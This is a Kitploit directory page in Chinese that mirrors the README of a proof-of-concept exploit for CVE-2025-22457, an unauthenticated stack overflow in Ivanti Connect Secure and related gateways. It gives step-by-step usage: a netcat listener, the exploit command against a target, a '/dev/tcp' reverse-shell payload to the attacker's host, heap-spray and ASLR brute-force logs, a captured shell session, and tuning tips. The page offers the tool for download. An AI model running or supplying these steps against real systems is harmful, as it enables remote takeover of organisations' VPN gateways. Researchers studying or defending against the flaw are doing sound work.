Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-22457 — PoC for CVE-2025-22457 - 影响 Ivanti Connect Secure、Pulse Connect Secure、Ivanti Policy Secure 和 ZTA Gateways 的远程未认证基于栈的缓冲区溢出漏洞 | Kitploit
工具/GitHubGitHub/sfewer-r7/cve-2025-22457
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试红队远程访问工具二进制利用
GitHubsfewer-r7/cve-2025-22457

CVE-2025-22457

PoC for CVE-2025-22457 - 影响 Ivanti Connect Secure、Pulse Connect Secure、Ivanti Policy Secure 和 ZTA Gateways 的远程未认证基于栈的缓冲区溢出漏洞

731531年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2025-22457 的 PoC

一个影响 Ivanti Connect Secure、Pulse Connect Secure、Ivanti Policy Secure 和 ZTA Gateways 的远程未经身份验证的基于栈的缓冲区溢出漏洞

概述

这是一个概念验证(PoC)漏洞利用程序,用于演示 CVE-2025-22457 的利用过程。有关该漏洞及利用策略的完整技术分析,请参阅我们的 Rapid7 分析:

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

使用方法

我们可以按如下方式对存在漏洞的 Ivanti Connect Secure 目标(版本 22.7r2.4)运行此脚本:

启动一个 netcat 监听器以捕获反弹 shell。

root@kitploit:~
C:\>ncat -lnvkp 8080

运行漏洞利用程序并暴力破解 ASLR(此过程会比较慢)。

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering..

当利用成功时,你将获得一个反弹 shell。

root@kitploit:~
C:\>ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$

调试

Web 子进程

根据底层硬件的不同,目标设备可用的 CPU 数量将决定 /home/bin/web 二进制文件会生成多少个子进程。由于所有传入的 HTTPS 请求都会在这些子进程之间均匀分配,我们需要考虑到这一点,并对所有子进程执行足够次数的堆喷射(heap spray)。之所以需要这样做,是因为当我们触发漏洞时,无法知道会在哪个子进程中触发。因此我们需要每个子进程中都有堆喷射。

  • 1 vCPU - 1 个 web 进程,无子进程
  • 2 vCPU - 1 个 web 父进程,2 个子进程
  • 4 vCPU - 1 个 web 父进程,4 个子进程(这是默认配置,对应 Ivanti Connect Secure ISA4000-V 平台)
  • 8 vCPU - 1 个 web 父进程,8 个子进程(这对应 Ivanti Connect Secure ISA6000-V 平台)

例如,在一台已获取 root 权限的存在漏洞的设备上,运行以下命令查看 /home/bin/web 子进程的数量:

root@kitploit:~
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#

你可以通过 --web_children 参数指定预期的 web 子进程数量,例如:

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4

libdsplibs 基地址

如果你在本地系统上测试 PoC,可能需要避免暴力破解 libdsplibs 基地址。在这种情况下,你可以通过 --libdsplibs 参数向 PoC 传递已知的基地址。例如,在一台已获取 root 权限的存在漏洞的设备上,运行以下命令:

root@kitploit:~
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#

然后你可以按如下方式将已知基地址传递给 PoC:

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
下载工具